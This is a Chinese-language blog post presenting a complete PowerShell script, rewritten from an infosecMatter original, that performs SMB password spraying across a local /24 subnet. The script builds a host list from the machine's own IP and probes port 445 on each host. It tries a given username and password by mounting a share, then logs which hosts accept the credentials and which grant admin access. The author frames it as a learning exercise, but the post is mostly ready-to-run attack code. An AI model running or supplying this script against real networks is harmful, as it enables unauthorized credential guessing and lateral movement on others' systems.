Bu1'Blog

如果能控制粗鄙的狂喜,就不会有深入骨髓的悲伤。

0%

powershell爆破smb的小脚本

发表于 分类于

还不是十分的满意,等待后续的优化…

脚本编写

原有的脚本来自于infosecMatter,经过实际测试发现存在BUG(或许就我一个人碰到了?),总得来说重写更多的是为了学习,而不是真的当作攻击脚本去使用(效率太低了…hhh)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
# 可用
[CmdletBinding()]
param(
    [Parameter(
    Position=0
    )]
    [String]
    $user,
    
    [Parameter(
    Position=1
    )]
    [String]
    $pass
);

Function iplist{
  if (!$pass) {
    Write-Host "usage: ./smb.ps1 <user> <password>"
    Write-Host " e.g.: ./smb.ps1 .\Administrator P@ssw0rd`n"
    return
  }
  Write-Host "Get IP..."
  $ip_tmp = ipconfig | Out-String;
  $ip_regex = "\d{2,3}\.\d{2,3}\.\d{2,3}";
  $ip = $ip_tmp -match $ip_regex;
  $i = 2;
  while($i -lt 255){
    echo ($Matches[0] + ".$i") >> hosts.txt;
    $i++;
  }
  Write-Host "Success!"
  Write-Host "Attempt attack..."
  smblogin;
}

Function smblogin-worker($h,$u,$p) {
  $u = $u -replace "^\.\\", "$h\"
  $c = New-Object System.Management.Automation.PSCredential $u, ($p | ConvertTo-SecureString -AsPlainText -Force)
  try {
    # 根据具体情况决定:\\$h\Users 或者 \\$h\Admin$
    if (New-PSDrive -Name Share -PSProvider FileSystem -Root \\$h\Users -Credential $c -EA SilentlyContinue) {
      Remove-PSDrive Share
      echo "True,admin"
    } else {
      if ($error[0].exception -Match 'password is incorrect') {
        echo "False"
      } elseif ($error[0].exception -Match 'Access is denied') {
        echo "True"
      }else{
        echo "False"
      }
    }
  } catch {
    echo "Error"
  }
}

Function worker-test-port {
  param($rh,$rp)
  $timeout = 3
  try {
    $t = new-Object system.Net.Sockets.TcpClient
    $c = $t.BeginConnect($rh,$rp,$null,$null)
    $w = $c.AsyncWaitHandle.WaitOne($timeout*1000,$false)
    If(!$w) {
      $t.Close()
      return $false
    } else {
      $null = $t.EndConnect($c)
      $t.Close()
      return $true
    }
  } catch {
    return $false
  }
}

Function smblogin{
  $hosts = "hosts.txt"
  $results = ".\results.txt"
  $start = date
  echo "Start: $start" | Out-File -Encoding ascii -Append $results
  $userm = ($user -replace "\\", "\\") -replace "\.", "\."
  foreach($ip in gc "$hosts") {
    Write-Host "Target:"$ip
    $x = (gc $results -EA SilentlyContinue | sls "^$ip,$userm,.*,True")
    if ($x) {
      Write-Host "user $user on $ip already found"
      continue
    }
    $x = (gc $results -EA SilentlyContinue | sls -CaseSensitive "^$ip,$userm,$pass,")
    if ($x) {
      Write-Host "user $user on $ip with $pass already tried"
      continue
    }
    if (!(worker-test-port $ip 445)) {
      Write-Host "$ip,445,Port unreachable"
      continue
    }
    $output = "$ip,$user,$pass,"
    $output += smblogin-worker $ip $user $pass
    Write-Host "$output"
    echo $output | Out-File -Encoding ascii -Append $results
  }
  $end = date
  echo "End: $end" | Out-File -Encoding ascii -Append $results
  Remove-Item "hosts.txt"
}
iplist;